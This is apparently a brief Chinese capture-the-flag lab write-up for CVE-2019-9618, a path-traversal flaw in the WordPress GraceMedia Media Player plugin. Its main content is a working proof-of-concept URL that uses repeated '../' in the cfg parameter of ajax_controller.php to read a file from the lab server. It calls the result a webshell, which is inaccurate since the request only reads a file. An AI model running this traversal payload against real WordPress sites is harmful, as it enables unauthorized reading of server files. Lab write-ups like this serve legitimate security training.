春秋云境CVE-2019-9618

1.阅读靶场介绍

没有任何思路

但是以往的wordpress会出现这个玩法可以试试

话不多说,进入正题

2.启动靶场

如下图所示

3.poc

直接在路径拼接上

https://eci-2ze8vcjw8w2qm243tmn5.cloudeci1.ichunqiu.com:80/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../flag

到此就可以完成webshell了

感谢您宝贵的时间

相关推荐
国科安芯22 分钟前
断电也隔离、听得真:ASL3159S 单通道 SPDT 模拟开关的“断电保护 + 音频保真“账
单片机·嵌入式硬件·安全·商业航天·抗辐射
hasty36 分钟前
2026软件供应链安全政策全景
安全·安全威胁分析·代码复审
小程序设计1 小时前
基于STM32的智慧厨房多参数安全监测与预警系统设计
stm32·嵌入式硬件·安全
锐速网络1 小时前
轻量化安全建设指南:无需硬件的SaaS化勒索病毒防御方案
网络安全·云备份·主机安全·saas安全·勒索病毒防护·轻量化安全·中小企业安全
绿蕉1 小时前
从“叠积木补安全“到“设计即安全“:EE 架构里的安全左移革命
安全·架构
Frag0ut2 小时前
Chrome与Chromium内核浏览器在Windows 11上的新特性全景解析
前端·chrome·windows·web安全·chromium·gemini ai·playready drm
小小小小钰儿3 小时前
1.5-Python网络编程
开发语言·网络·python·web安全·计算机·网络安全
hasty3 小时前
01_新网络安全法下的软件漏洞治理
网络·安全·web安全
迪康Defender4 小时前
内网终端打印安全:权限、审批、审计三位一体防护实践
安全
猫咪宝妖4 小时前
信息安全工程师 第四级 结构化保护级
网络·数据库·安全